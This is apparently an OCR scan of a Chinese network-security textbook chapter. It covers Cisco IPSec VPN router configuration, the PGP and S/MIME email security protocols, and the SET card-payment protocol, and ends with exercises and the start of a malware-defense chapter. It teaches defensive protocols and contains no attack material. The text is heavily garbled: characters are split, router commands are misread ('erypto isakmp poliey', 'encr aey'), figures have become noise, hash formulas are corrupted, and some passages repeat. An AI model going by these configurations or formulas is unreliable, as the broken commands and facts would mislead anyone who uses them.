isakmp policy” 关 键 字 用 于 定义 建立 ISAKMP SA 的 参数 ,把 这 组 参数 使 用 数字 10 表示 ， 
说 明 加 密 算法 使 用 aes, 身 份 认 证 使 用 预 共享 密 钥 ,Diffie-Hellman 密 钥 交换 采用 第 5 组 ， 
SA 的 生存 时 间 为 900s。“crypto isakmp key” 关 键 字 定 义 预 共 享 密 钥 是 “cisco”, 并 且 只 
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在 与 “10. 2. 0. 2 通信 时 才 有 效 。“crypto ipsec transform-set” 关 键 字 定义 IPSec SA 的 参 
数 集合 ,设置 为 AH 协议 采用 SHA-HMAC 算法 ,ESP 协议 采用 3DES 加 密 , 该 参数 集合 
用 数字 50 表示 。 关 键 字 crypto map 将 不 同 的 ISAKMP SA 和 IPSec SA 组 合 ,形成 隧道 
策略 ,命名 为 mymap, 并 应 用 到 接口 “10. 1. 0.1”。“mymap” 定 义 隧道 对 端 是 “10. 2. 0. 2”， 
IPSec SA 周期 为 1800s, 使 用 IPSec SA 的 “50” 参 数 集合 ,使 用 ISAKMP SA 的 “10” 参 数 

合 ,“match address 101” 表 示 该 隧道 只 用 于 符合 ACL 101 的 IP 地 址 列表 。 从 主机 PC0 
发 送 ICMP 请 求 给 主机 Server0 的 过 程 ,如 图 11-15 一 图 11-18 所 示 。 首 先 发 起 ISAKMP 
关联 过 程 ,图 11-15 指明 hello 阶段 给 出 了 相应 的 协商 参数 ; 图 11-16 进入 密 钥 交换 阶段 ; 
图 11-17 指明 密 钥 变 更 后 ,建立 安全 信道 ,第 二 阶段 的 IPSec SA 建立 过 程 的 数据 都 是 加 
密 数据 。ISAKMP 过 程 结束 后 ,图 11-18 给 出 了 使 用 IPSec 对 数据 进行 加 密 和 认证 的 报 
文 示例 ,可 以 看 到 “mymap” 策 略 综合 使 用 AH 和 ESP 协议 对 报 文 进行 封装 ,图 11-19 是 
解 封装 后 Server0 收 到 的 原始 ICMP 报 文 。 


10.1.0.0/24p7 RouterI \\ 10.2.0.0/24 Server-PT 
Le 10300247 Ser 


4 











1841 
10.0.0.0/247 Router0 Router2 “\ 


N10.4.0.0/24 
IPSec is used on all traffic between 、 


10.0.0.0/24 and 10.4.0.0/24 on 
PC-PT Router0 and Router2 


PC0 


Server-PT 
Server0 


图 11-13 IPSec VPN 拓扑 


Route0 的 配 袜 Route2 的 也 置 


erypto isakmp poliey 10 erypto isakmp policy 10 
encr aey ener aes 
authentication pre-share aurhentication pre-share 
group 5 group 5 
Ufetime 900 Mfetime 900 
1 了 
erypto isakmp key ciseo address 10.2.0.2 erypto isakmp key cisco address 10.1.0.7 
/ 了 
erypto ipsee transform-ser 50 ah-sha-hmac esp-3des erypro ipsee transform-ser 50 ah-sha-hmac esp-3des 
1 了 
erypto map mymap 10 ipsec-isakmp erypto map mymap 10 ipsec-isakmp 
set Peer 10.2.0.2 Ser peer 10.1.0.1 
Ser security-associarion lifetime seconds 1800 ser security-association lifetime seconds 1800 
Ser transform-ser 50 Ser transform-ser 50 
mateh address 101 match address 101 
inmterface FastEthernert/ imterface Seriat0/0m 
ip address 10.1.0.1 255.255.255.0 ip uddress 10.2.0.2 255.255.255.0 
duplex auto duplex auto 
Speed auto Speed auto 
Fe De empto map mmap 
aceess-list 101 permit ip 10.0.0.0 0.0.0.255 10.4.0.0 0.0.0.255 aceess-list 101 permir ip 10.4.0.0 0.0.0.255 10.0.0.0 0.0.0.255 


11-14 ”Cisco 路 由 器 的 IPSec VPN 设置 
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图 11-15 IPSec ISAKMP 协商 参数 
































INITIATOR COOKIE: F0024FE480429DED 





RESPONDER COOKIE: F002CD017481C187 


FLAG: Ox1 
























































11-16 IPSec ISAKMP 密 钥 交换 11-17 IPSec ISAKMP 变更 密 钥 


> 网 络 攻防 技术 与 实战 一 一 深入 理解 信息 安全 防护 体系 














PDU Information at Device: RouterO 





pOUInformation at Device Router? 




















OstModel [inbound PDU Details | Outbound PDU Detais | 














Osi Model | inbound PDU Detais | outbound PDU Detais 








PDU Formats 
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NEXT [LENGT™H:0 
HEADER: 
0x32 
AH Spl: 1558150602 
AH :0 
AH ICV: 4721391E4721391E4721391E 
AH DATA AUTHENTICATED WITH SHA 








NCAPSULATING SECuRITY PAYLOAD 
0 日 16 31 Bits 





ESP Sp1: 1767191065, 


ESP SEQUENCE: 0 
ESP DATA ENCRYPTED WITH 3DES 
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o 4 i 19 Bytes 





和 1 
PREAMBLE: DEST MAC: SRC MAC: 
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Opr om om 
DATA (VARIABLE LENGTH) 








Th 253 























CHECKSUM 
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图 11-18 IPSec AH 和 ESP 综合 使 用 


图 11-19 解 封 后 的 原始 ICMP 报 文 


11.2 电子 邮件 安全 协议 


V2 1 POP 


PGP(Pretty Good Privacy) 可 用 于 安全 传输 电子 邮件 , 它 主 要 实现 发 送 方 认证 、 邮 件 
加 密 及 编 解 码 功能 ,其 工作 过 程 如 图 11-20 所 示 。 发 送 方 使 用 自己 的 私 钥 SKs 加 密 邮 件 
内 容 M 的 散 列 码 (SHA_1(M)) 形 成 数字 签名 Esxs (SHA_1(M)), 然 后 将 签名 附加 在 消 
息 后 面 ,经 过 压缩 后 ,再 使 用 发 送 方 生成 的 对 称 密 钥 K 和 双方 预 设 的 对 称 算 法 (3DES) 加 
密 ,形成 密 文 。 使 用 接收 方 的 公 钥 PK 加 密 对 称 密 钥 形成 数字 封面 ,附加 在 密 文 后 面 ,经 
过 Base64 编码 后 ,一 并 发 送 给 接收 方 。 接 收 方 首先 进行 Base64 解码 ,然后 用 自己 的 私 钥 
SKe 解 开 数 字 封 面 ,获取 对 称 密 钥 K ,接着 利用 KK 解 开 密 文 并 进行 解压 缩 ,获得 明文 消息 
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11-20 ”PGP 加 /解密 过 程 
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M' 和 数字 签名 ,再 使 用 发 送 方 的 公 钥 PKs 对 数字 签名 进行 验证 ,获得 原始 消息 的 散 列 码 
(SHA_1(MD)) ,最 后 计算 消息 M 的 散 列 码 SHA_1CM' ) ,比较 是 否 与 SHA_1CM) 相 同 ,如 
果 相 同 则 说 明 消息 没 被 自 改 并 同时 验证 了 发 送 方 的 身份 。 


11.2.2 S/MIME 


S/MIME(Secure/Multipurpose Internet Mail Extension) 是 在 通用 Internet 邮件 扩 
展 协 议 邮 件 格式 (MIME) 的 基础 上 增加 了 与 安全 传输 邮件 相关 的 内 容 类 型 ,增加 的 内 容 
类 型 用 于 表示 认证 发 送 方 的 数字 签名 和 加 密 邮 件 内 容 产生 的 密 文 。 

SMTP 协议 只 能 传输 7 位 ASCII 码 ,无 法 传输 包含 二 进 制 信息 的 内 容 , 如 可 执行 文 
件 等 。MIME 是 为 了 解决 SMTP 的 问题 而 提出 的 增强 协议 。MIME? 主要 包括 三 部 分 
内 容 : 

(1) 5 个 新 的 邮件 头 部 字段 ,提供 有 关 邮 件 内 容 的 信息 。 

@ MIME-Version: 版 本 号 ,当前 为 1.0; 

@ Content-Type: 通过 类 型 和 子 类 型 参数 说 明 邮件 内 容 的 类 型 ; 

@ Content-ID: 内 容 标识 符 , 唯 一 标识 邮件 内 容 ; 

@ Content-Transfer_Encoding: 内 容 的 编码 方式 ; 

@ Content-Description: 描述 邮件 内 容 的 可 读 字符 串 。 

(2) 各 种 邮件 内 容 格 式 的 定义 ,对 多 媒体 电子 邮件 的 表示 方法 进行 标准 化 ( 表 11-2) 。 

(3) 编码 定义 ,可 以 对 任何 格式 进行 转换 ,以 便 SMTP 邮件 系统 传输 ( 表 11-3) 。 

表 11-2 MIME 支持 的 常见 邮件 内 容 类 型 















































类 型 子 类 型 说 明 
全 Plain 无 格式 文本 ,简单 ASCII 字符 串 
Enriched 提供 多 格式 的 灵活 文本 
Wd 邮件 由 多 个 子 报 文 组 成 ,多 个 不 同 子 报 文 互相 独立 ,按照 在 邮件 中 
的 顺序 提交 
Multipart Parallel 与 Mixed 类 似 , 但 是 子 报 文 顺序 不 固定 
Alternative 不 同 子 报 文 是 相同 信息 的 不 同 版 本 ,提供 最 佳 版 本 给 收 件 人 
Digest 与 Mixed 类 似 , 但 是 子 报 文 是 完整 的 rfc822 邮件 
rfc822 rfc822 邮件 
Message Partial 为 传输 超大 邮件 ,分割 邮件 ,但 是 对 收 件 人 透明 
External-body | 包含 一 个 指针 ,指向 存储 在 其 他 位 置 的 对 象 
人 jpeg JPEG 格式 图 像 
gif GIF 格式 图 像 
Video mpeg MPEG 格式 动画 
Audio Basic 单 通道 8 位 编码 ,8kHz 采样 率 
Nb PostScript Adobe Postscript 
Octet-stream | 字 节 流 
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表 11-3 MIME 编码 类 型 


























编 码 说 明 
7b 数据 由 短 行 (每 行 不 超过 1000 字符 ) 的 7 位 ASCI 字 符 表 示 
8b 存在 非 标准 ASCII 字 符 , 即 最 高 位 是 1 的 8 位 字 节 
binary 不 仅 允许 包含 非 标准 ASCII 字符 ,而且 每 行 长 度 可 以 超过 1000 
quoted-printable 一 种 既 可 以 用 ASCII 字 符 表示 数据 ,又 尽 可 能 保持 可 读 性 的 编码 
Base64 用 64 个 可 打印 字符 表示 6 位 二 进 制 数组 成 的 64 个 值 
x-token 用 于 命名 非 标准 编码 





邮件 的 发 送 方 首先 将 邮件 内 容 组 织 成 MIME 格式 ,然后 编码 成 7 位 ASCII 码 模式 ， 
通过 邮件 服务 器 发 给 接收 方 ,接收 方 将 邮件 内 容 恢 复 成 MIME 格式 ,然后 提交 给 邮件 客 
户 程序 ,客户 程序 负责 提取 各 类 邮件 内 容 。 表 11-2 给 出 了 MIME 支持 的 常见 邮件 内 容 
类 型 ,可 以 是 任意 二 进 制 数据 ,如 图 像 动画 和 音频 等 。 表 11-3 给 出 了 邮件 的 编码 方式 ， 
最 常用 的 是 Base64 编码 ,将 任意 二 进 制 数据 以 6 位 为 分 组 ,在 ASCII 字 符 集中 选择 64 个 
可 打印 字符 ,对 应 6 位 二 进 制 数 的 64 个 不 同 值 , 这 样 ,每 6 位 二 进 制 数 用 8 位 可 打印 
ASCII 字符 表示 。 

下 面 是 一 封 MIME 邮件 报 文 的 示例 , 它 由 两 个 独立 的 子 报 文 组 成 ,一 个 只 包含 字符 
信息 , 另 一 个 包含 GIF 图 像 ; 邮件 头 部 的 Content-Type 类 型 参数 “multipart/mixed” 说 明 
有 多 个 子 报 文 。“boundary” 关 键 字 用 于 定义 子 报 文 的 分 隔 符 , 如 果 两 个 连 字符 后 面 跟随 
了 分 隔 符 , 表 明 新 的 子 报 文 开始 ; 如 果 分 隔 符 后 面 跟 两 个 连 字符 ,表示 整个 “multipart” 内 

Date: Thu, 13 Jul 2017, 22:22:00 

From: fguo@163. com 

Subject: test 

To: guofan@126. com 

MIME — Version: 1.0 

Content - Type: multipart/mixed;boundary = DEFINE 


—— DEFINE 
This is a test. 


—— DEFINE 
Content - Type: image/gif 

Content - Transfer — Encoding: base64 
~…" ( 见 图 片 数据 ) 


—— DEFINE —— 

S/MIME 增加 了 与 安全 传输 电子 邮件 有 关 的 内 容 类 型 ,如 “Application/signedData” 
用 于 认证 ,“Application/envelopedData” 用 于 加 密 。 加 密 和 认证 过 程 如 图 11-21 所 示 。 加 
密 后 的 子 报 文 数字 签名 、 散 列 算法 标识 符 、 签 名 算法 标识 符 和 公 钥 证 书 作为 邮件 内 容 的 
一 部 分 ,经 过 Base64 编码 后 作为 实际 发 送 的 邮件 子 报 文 。 
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[ee multipart/mixed; boundary=DEFINE 

































































消息 消息 站 ee NR pe: ppleation/signedD et 
Content-Transfer-Encoding: base6: 
HA [Eneypion} | 站 光 ER 认证 子 报 文 
签 
SHAT| | 
SKs RSA 
证 书 | Content-Type: multipart/mixed; boundary=DEFINE 
-DEFINE 
消息 密 文 广 Content-Type: Application/envelopedData 
Content-Transfer-Encoding: base64 



































tx “ee 一 EE 后 加 密 子 报 文 
3DES | | 


PKR 








图 11-21 S/MIME 加 密 和 认证 邮件 子 报 文 过 程 


11.3 安全 电子 交易 协议 


安全 电子 交易 (Secure Electronic Transaction, SET) 协 议 是 目前 唯一 实用 的 保证 信 
用 卡 数 据 安全 的 应 用 层 安 全 协议 。SET 协议 使 用 对 称 加 密 、 公 钥 加 密 、 数 字 信封 ,数字 签 
名 、 报 文摘 要 和 双重 签名 技术 ,保证 在 Web 环境 中 数据 传输 和 处 理 的 安全 性 ,协议 本 身 非 

常 复杂 。 它 是 PKI 架构 下 的 典型 实现 ,提供 了 消费 者 、 商 家 和 银行 之 间 的 认证 ,确保 交易 

数据 的 完整 性 可靠 性 和 不 可 否认 性 ,不 会 将 消费 者 卡号 等 信息 暴露 给 商家 。 

SET 应 用 系统 如 图 1-15 所 示 ,由 持 卡 人 、 商 家 支付 网 关 、 认 证 中 心 链 \ 发 卡 机 构 和 商 
家 结算 机 构 组 成 。 

(1) 商家 结算 机 构 。 负 责 为 商家 建立 账户 ,认证 持 卡 人 用 于 消费 的 支付 卡 的 有 效 性 ， 
通过 和 发 卡 机 构 协 调 完成 货款 支付 的 金融 机 构 。 

(2) 支付 网 关 。 实 现 互联 网 和 支付 网 络 之 间 的 互联 ,实现 SET 消息 和 电子 转账 所 要 
求 的 消息 之 间 的 相互 转换 。 

(3) 认证 中 心 链 。 持 卡 人 、 商 家 、 支 付 网 关 、 商 家 结算 机 构 都 信任 的 证 书签 发 机 构 。 

(4) 发 卡 机 构 。 负 责 向 持 卡 人 发 卡 , 并 开设 账户 的 机 构 ,如 银行 , 它 也 负责 向 商家 支 
付 持 卡 人 消费 的 金额 。 

SET 的 目标 如 下 。 

(1) 保证 订货 和 支付 信息 的 保密 性 。 通 过 加 密 保证 只 有 合法 接收 者 才能 读 取 信息 ， 
同时 减少 冒充 持 卡 人 进行 交易 的 风险 。 

(2) 保证 数据 完整 性 。 保 证 电子 交易 过 程 所 涉及 的 消息 是 未 被 自 改 的 。 

(3) 认证 持 卡 人 和 信用 卡 之 间 的 绑 定 关系 。 确 认 持 卡 人 是 信用 卡 账户 的 合法 拥有 
者 ,使 用 数字 签名 技术 和 证 书 实现 。 

(4) 认证 商家 身份 。 确 认 商 家 身份 ,确认 与 商家 进行 的 电子 交易 是 安全 的 。 

(5) 确保 合法 参与 电子 交易 的 各 方 安全 。 加 密 、 认 证 机 制 保 证 合法 参与 电子 交易 的 




















网 络 攻防 技术 与 实战 一 一 深入 理解 信息 安全 防护 体系 





各 方 的 安全 。 

(6) 安全 性 独立 于 传输 层 。 无 须 传 输 层 提供 类 似 TLS 或 SSL 之 类 的 安全 传输 协议 ， 
就 可 实现 安全 性 。 

(7) 独立 于 传输 网 络 和 操作 系统 。SET 协议 和 报 文 格式 独立 于 传输 消息 的 网 络 , 独 
立 于 处 理 消息 的 硬件 平台 和 操作 系统 。 


11.3.1 SET 工作 过 程 


SET 的 工作 过 程 可 以 分 为 身份 认证 ,购买 请 求 、 授 权 请 求 和 响应 、 购 货 响 应 、 支 付 请 
求 和 响应 等 步骤 。 

1. 身份 认证 

在 交易 前 , 持 卡 人 \ 商 家 和 支付 网 关 必须 获得 认证 中 心 签发 的 证 书 。 持 卡 人 C 向 商 
家 A 发 送 初 始 请 求 消息 ,包括 持 卡 人 的 信用 卡 类 型 、 发 卡 机 构 、 会 话 标识 符 和 随机 数 , 请 
求 消息 经 过 如 图 11-22 所 示 的 封装 处 理 后 发 给 商家 。 原 始 请 求 消息 包括 数字 签名 .证书 
和 会 话 信息 ,经 过 3DES 加 密 后 生成 密 文 , 加 密 密 钥 K 使 用 商家 的 公 钥 加 密 后 与 密 文 一 
并 发 送 给 商家 ,这 里 的 PKs 是 指 CA 签发 的 A 的 证 书 中 的 公 钥 。 



























































明文 明文 
| =| 3DES 
i 数字 
SHA_1 Ei ti 
-| _1 | Encryption 等 名 用 
[sa 证 书 所 | Encryption 











fi 
图 11-22 持 卡 人 封装 请 求 消息 


商家 收 到 请 求 消息 后 ,采用 图 11-23 所 示 的 过 程 对 消息 进行 解密 ,进行 持 卡 人 的 签名 
验证 和 数据 完整 性 检测 。 商 家 用 自己 的 私 钥 从 数字 封面 中 解密 出 对 称 密 钥 ,然后 解 开 
密 文 获得 明文 信息 ,使 用 持 卡 人 的 公 钥 进行 签名 验证 ,获得 原始 的 散 列 码 ,与 明文 信息 的 
散 列 码 进行 比较 ,如 果 相 等 则 认证 成 功 。 认 证 成 功 后 ,向 持 卡 人 发 出 初始 响应 消息 ,消息 
中 包括 此 次 交易 的 标识 符 、 商 家 和 支付 网 关 的 公 钥 证 书 。 



















































































一 | 消息 一 |SHA_1 。 相等 ， 认 证 成 功 
密 文 =| 3DES 
数字 | ~ Decryprion | 不 等 ， 认 证 失败 
学 = 容 
封面 ecryption = fi 
{sx 


11-23 ”商家 认证 持 卡 人 身份 和 确认 数据 完整 性 
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2. 购买 请 求 


持 卡 人 构建 支付 信息 (Payment Information, PI) 和 订货 信息 (Order Information， 
OD ,并 按 图 11-24 所 示 过 程 封装 成 购买 请 求 , 发 送 给 商家 。 其 中 ,PI 用 于 支付 网 关 实 现 
持 卡 人 账户 至 商家 账户 的 电子 转账 ,只 允许 支付 网 关 读 取 支付 信息 。OI 用 于 向 商家 确认 
购 货 清单 。 为 了 将 两 种 信息 绑 定 在 一 块 ,采用 双重 签名 方式 Eskc (SHA_1(SHA_1(PD 
11 (SHA_1(OD))”, 发 送 给 支付 网 关 的 信息 是 PI.SHA_1(OD 、 双 重 签名 ,发 送 给 商家 
的 信息 是 OI.SHA_1(PD 、 双 重 签名 和 持 卡 人 证 书 。 









































































PI 发 给 支 
3DES| 一 | 付 网 关 
SHAT 密 文 
(OD 
双重 RS 二 
签名 Encryption 广 一 一 一 | 汉人 
SHAT 
(PD | ] 
机 一 | 
双重 
签名 Encryption 
持 卡 人 
证 书 PKA 











图 11-24 ”购买 请 求 封装 过 程 


商家 收 到 请 求 后 ,进行 如 图 11-25 所 示 的 签名 认证 和 完整 性 检测 过 程 , 首 先 解密 OT、 
双重 签名 和 持 卡 人 证 书 , 然 后 比较 SHA_1(SHA_1(OD ||SHA_1(PD) 与 Dekc( 双 重 签 
名 ) 是 否 相 等 ,如 果 相 等 表明 OI 和 SHA_1(PI) 确 实 由 持 卡 人 发 送 , 双 重 签名 有 效 。 然 后 ， 
商家 处 理 OI, 通 过 支付 网 关 确 认 持 卡 人 账户 的 有 效 性 ,向 支付 网 关 发 送 确认 持 卡 人 支付 
能 力 的 授权 请 求 消息 。 

3. 授权 请 求 和 响应 

商家 发 送 给 支付 网 关 的 授权 请 求 消息 包含 两 部 分 内 容 , 一 是 将 持 卡 人 发 来 的 有 关 
支付 的 密 文 转发 给 支付 网 关 ; 二 是 商家 需要 支付 网 关 确 认 的 授权 信息 ,包括 交易 标识 
符 和 持 卡 人 需要 支付 的 金额 等 。 这 些 信息 由 商家 签名 后 ,发 给 支付 网 关 , 如 图 11-26 
所 示 。 

支付 网 关 收 到 授权 请 求 后 ,首先 认证 持 卡 人 的 双重 签名 (图 11-27) ,证实 PI 和 
SHA_1(OD 确 实 由 持 卡 人 发 送 ,并 且 没 有 被 臭 改 。 然 后 证 明 授 权 请 求 确实 由 商家 发 
送 ,验证 解密 后 的 授权 信息 和 签名 。 完 成 认证 后 ,支付 网 关 比 较 授权 信息 和 PI, 确 定 
两 组 信息 中 的 交易 标识 符 和 金额 相同 ,然后 通过 支付 系统 向 发 卡 机 构 求 证 持 卡 人 的 
支付 能 力 ,证 实 持 卡 人 账户 具有 交易 所 需 金 额 的 支付 能 力 后 ,向 商家 发 送 授 权 响 应 
消息 。 
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2. 购买 请 求 


持 卡 人 构建 支付 信息 (Payment Information, PI) 和 订货 信息 (Order Information， 
OD ,并 按 图 11-24 所 示 过 程 封装 成 购买 请 求 , 发 送 给 商家 。 其 中 ,PI 用 于 支付 网 关 实 现 
持 卡 人 账户 至 商家 账户 的 电子 转账 ,只 允许 支付 网 关 读 取 支付 信息 。OI 用 于 向 商家 确认 
购 货 清单 。 为 了 将 两 种 信息 绑 定 在 一 块 ,采用 双重 签名 方式 Eskc (SHA_1(SHA_1(PD 
11 (SHA_1(OD))”, 发 送 给 支付 网 关 的 信息 是 PI.SHA_1(OD 、 双 重 签名 ,发 送 给 商家 
的 信息 是 OI.SHA_1(PD 、 双 重 签名 和 持 卡 人 证 书 。 
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图 11-24 ”购买 请 求 封装 过 程 


商家 收 到 请 求 后 ,进行 如 图 11-25 所 示 的 签名 认证 和 完整 性 检测 过 程 , 首 先 解密 OT、 
双重 签名 和 持 卡 人 证 书 , 然 后 比较 SHA_1(SHA_1(OD ||SHA_1(PD) 与 Dekc( 双 重 签 
名 ) 是 否 相 等 ,如 果 相 等 表明 OI 和 SHA_1(PI) 确 实 由 持 卡 人 发 送 , 双 重 签名 有 效 。 然 后 ， 
商家 处 理 OI, 通 过 支付 网 关 确 认 持 卡 人 账户 的 有 效 性 ,向 支付 网 关 发 送 确认 持 卡 人 支付 
能 力 的 授权 请 求 消息 。 

3. 授权 请 求 和 响应 

商家 发 送 给 支付 网 关 的 授权 请 求 消息 包含 两 部 分 内 容 , 一 是 将 持 卡 人 发 来 的 有 关 
支付 的 密 文 转发 给 支付 网 关 ; 二 是 商家 需要 支付 网 关 确 认 的 授权 信息 ,包括 交易 标识 
符 和 持 卡 人 需要 支付 的 金额 等 。 这 些 信息 由 商家 签名 后 ,发 给 支付 网 关 , 如 图 11-26 
所 示 。 

支付 网 关 收 到 授权 请 求 后 ,首先 认证 持 卡 人 的 双重 签名 (图 11-27) ,证实 PI 和 
SHA_1(OD 确 实 由 持 卡 人 发 送 ,并 且 没 有 被 臭 改 。 然 后 证 明 授 权 请 求 确实 由 商家 发 
送 ,验证 解密 后 的 授权 信息 和 签名 。 完 成 认证 后 ,支付 网 关 比 较 授权 信息 和 PI, 确 定 
两 组 信息 中 的 交易 标识 符 和 金额 相同 ,然后 通过 支付 系统 向 发 卡 机 构 求 证 持 卡 人 的 
支付 能 力 ,证 实 持 卡 人 账户 具有 交易 所 需 金 额 的 支付 能 力 后 ,向 商家 发 送 授 权 响 应 
消息 。 
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图 11-26 ”授权 请 求 消息 封装 过 程 


授权 响应 消息 的 封装 处 理 过 程 如 图 11-28 所 示 , 包 含 两 部 分 信息 ,一 是 授权 信息 ,用 
于 告知 商家 持 卡 人 的 支付 能 力 已 经 得 到 证 实 ; 二 是 支付 网 关 的 承兑 凭证 ,表示 支付 网 关 
随时 可 以 实现 授权 信息 给 出 的 本 次 交易 的 电子 转账 。 两 者 都 需要 支付 网 关 签 名 ,只 有 支 
付 网 关 才 能 验证 承兑 凭证 , 它 是 商家 向 持 卡 人 提供 本 次 交易 的 物品 或 服务 后 ,要 求 支付 网 
关 完 成 电子 转账 的 凭证 ,不 允许 商家 对 其 进行 处 理 。 

商家 只 能 认证 授权 信息 的 签名 ,证 实 授权 信息 由 支付 网 关 发 送 ,保留 支付 信息 密 文 ， 
用 于 要 求 支付 网 关 转 账 时 使 用 。 商 家 向 持 卡 人 发 送 购 货 响 应 消息 ,同时 向 持 卡 人 提供 服 
务 或 物品 。 
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图 11-26 ”授权 请 求 消息 封装 过 程 
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关 完 成 电子 转账 的 凭证 ,不 允许 商家 对 其 进行 处 理 。 

商家 只 能 认证 授权 信息 的 签名 ,证 实 授权 信息 由 支付 网 关 发 送 ,保留 支付 信息 密 文 ， 
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图 11-27 支付 网 关 验 证 授权 请 求 信息 
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图 11-28 授权 响应 消息 封装 处 理 过 程 


4. 购 货 响应 








购 货 响应 消息 包含 商家 确认 持 卡 人 OI 的 内 容 , 这 些 确认 信息 由 商家 进行 图 11-22 所 
示 的 加 密 和 签名 处 理 后 ,发 送 给 持 卡 人 , 持 卡 人 进行 图 11-23 所 示 的 签名 认证 和 完整 性 检 


测 后 ,确定 本 次 交易 涉及 的 网 络 操作 成 功 完成 。 
5. 支付 请 求 和 响应 


商家 提供 物品 或 服务 后 ,向 支付 网 关 发 送 支付 请 求 消息 ,如 图 11-29 所 示 ,请 求 支付 
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网 关 进 行 电子 转账 。 请 求 消息 包括 两 部 分 ,一 是 支付 网 关 包含 在 授权 响应 消息 中 的 承兑 























凭证 ; 二 是 支付 请 求 消息 ,给 出 交易 标识 符 和 支付 金额 等 。 支 付 请 求 信息 经 过 签名 和 加 
密 处 理 后 发 送 给 支付 网 关 。 
支付 信 。 | 支付 信 
息 密 文 息 密 广 
请 求 
信息 
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图 11-29 支付 请 求 消息 封装 过 程 


支付 网 关 收 到 请 求 后 ,完成 对 请 求 信息 的 签名 认证 和 完整 性 检测 ,同时 完成 对 承兑 凭 
证 的 签名 认证 和 完整 性 检测 。 确 认 承 兑 凭证 无 误 , 支 付 请 求 信 息 中 的 交易 标识 符 和 金额 
与 承兑 凭证 中 的 信息 相同 ,通过 支付 系统 要 求 金融 机 构 完 成 电子 转账 ,确认 转账 完成 后 ， 
向 商家 发 送 支付 响应 消息 。 

商家 收 到 支付 响应 消息 后 ,完成 本 次 交易 ,保留 支付 响应 消息 ,作为 今后 和 支付 网 关 
对 账 的 赁 证。 同样 ,支付 响应 消息 要 经 过 图 11-22 所 示 的 加 密 签名 处 理 , 商 家 要 对 响应 消 
息 进 行 图 11-23 所 示 的 签名 认证 和 完整 性 检测 。 


11.3.2 SET 的 优 缺点 


从 工作 流程 看 ,SET 具有 以 下 优点 : 

(1) 解决 了 客户 信息 的 安全 性 问题 ,虽然 客户 信息 要 经 过 商家 ,但 是 商家 无 法 读 取 这 
些 信息 ，; 

(2) 解决 了 客户 与 发 卡 机 构 、 客 户 与 商家 、 商 家 与 发 卡 机 构 之 间 的 多 方 认 证 问题 ; 

(3) 所 有 支付 过 程 在 线 进 行 , 保 证 交易 实时 性 ; 

(4) SET 协议 与 硬件 平台 ,操作 系统 和 软件 无 关 , 直 接 在 TCP/IP 协议 上 实现 安全 访 
问 ,与 其 他 安全 机 制 不 冲突 。 

SET 的 缺点 主要 是 : 

(1) 协议 过 于 复杂 ,导致 实现 协议 的 软 硬 件 造价 过 高 ; 

(2) 在 交易 中 需要 进行 多 次 加 /解密 操作 ,要求 服 务 器 硬件 有 较 高 处 理 能 力 ; 

(3) 涉及 的 通信 实体 较 多 ,需要 每 个 实体 都 必须 支持 SET; 

(4) SET 是 针对 用 卡 支付 的 交易 而 设计 的 支付 规范 ,无 卡 支付 的 交易 方式 与 它 无 关 。 
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与 SSL 协议 相 比 ,SET 的 主要 区 别 在 于 : 


(1) SET 较为 复杂 ,应 用 成 本 高 ,需要 得 到 认证 中 心 的 支持 ,同时 商家 和 发 卡 机 构 都 
需要 支持 。 

(2) SET 可 以 实现 多 方 认证 ,要求 所 有 实体 都 必须 拥有 证 书 ; 而 SSL 的 客户 证 书 可 
选 ,SSL 也 无 法 实现 多 方 认证 。 

(3) SET 是 多 方 报 文 协议 ,而 SSL 仅仅 在 通信 双方 之 间 建 立 安全 连接 。 

(4) SSL 是 面向 连接 的 ,而 SET 允许 各 方 的 报 文 交换 不 是 实时 的 。 

(5) SET 报 文 能 够 在 发 卡 机 构 内 部 网 络 和 其 他 网 络 传 输 ,而 SSL 只 能 与 Web 浏览 
器 绑 定 在 一 起 。 

(6) SSL 相对 不 安全 ,不 能 提供 不 可 否认 性 ,也 不 是 专门 为 电子 商务 而 设计 。 


11.4 小 结 


虚拟 专用 网 (VPN) 是 建立 在 公用 网 络 的 通信 隧道 ,构成 由 某 个 组 织 或 某 些 用 户 专 用 
的 通信 网 络 ,主要 包括 IP 隧道 .远程 接 和 人 二 层 隧 道 和 虚拟 专用 局 域 网 VPLS 三 种 连接 方 
式 。 加 密 隧道 通常 采用 IPSec 协议 ,形成 IPSec VPN。 

安全 电子 邮件 协议 主要 包括 PGP 和 S/MIME 两 种 ,PGP(Pretty Good Privacy) 可 用 
于 安全 传输 电子 邮件 ,主要 实现 发 送 方 认 证 .邮件 加 密 及 编 解码 功能 ; S/MIME 在 通用 
Internet 邮件 扩展 协议 邮件 格式 (MIME) 的 基础 上 增加 了 与 安全 传输 邮件 相关 的 内 容 类 
型 ,用 于 表示 认证 发 送 方 的 数字 签名 和 加 密 邮 件 内 容 产生 的 密 文 。 

安全 电子 交易 (SET) 是 保证 信用 卡 数据 安全 的 应 用 层 安全 协议 ,包括 身份 认证 、 购 买 
请 求 .授权 请 求 和 响应 、 购 货 响 应 、 支 付 请 求 和 响应 等 步骤 。SET 解决 了 客户 与 发 卡 机 
构 、 客 户 与 商家 、 商 家 与 发 卡 机 构 之 间 的 多 方 认证 问题 ,但 是 协议 较为 复杂 ,应 用 成 本 高 ， 
需要 得 到 认证 中 心 的 支持 。SET 要 求 所 有 通信 实体 都 必须 拥有 证 书 。 


习 题 


11-1 简 述 远程 接 人 VPN 中 ,自愿 隧道 方式 下 ,远程 主机 接 人 内 网 的 过 程 和 数据 传 
输 的 协议 转换 过 程 。 

11-2 假设 图 11-10 的 CE1 和 CE2 的 站 表 初 始 都 为 空 (VLAN 已 经 划分 好 ) ,此 时 主 
机 A 发 送 一 个 ICMP 报 文 给 主机 C,CE1 和 CE2 如 何 操作 ? 站 表 如 何 变化 ? 

11-3 针对 图 11-14 的 拓扑 ,如 果 要 实现 不 做 加 密 保 护 的 IP 隧道 通信 ,R0 和 R2 如 
何 进 行 配置 ? 

11-4 简 述 PGP 的 邮件 加 密 过 程 。 

11-5 ”S/MIME 实现 邮件 安全 传输 的 基本 思路 是 什么 ? 它 和 PGP 有 什么 相似 之 处 ? 

11-6 用 户 通过 SET 实现 电子 转账 后 ,银行 通过 哪 种 凭证 证 明 该 次 转账 确实 由 用 户 
本 人 完成 ? 

11-7 SET 交易 结束 后 ,商家 用 什么 凭证 证 明 用 户 已 经 完成 电子 转账 ? 
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恶意 代码 防范 与 系统 安全 


学 习 要 求 : 

理解 文件 感染 型 病毒 的 实现 原理 ,理解 病毒 防范 方法 的 技术 原理 。 

。 理解 蠕虫 防范 方法 的 技术 原理 ,熟练 掌握 各 种 基本 的 木马 防范 方法 。 
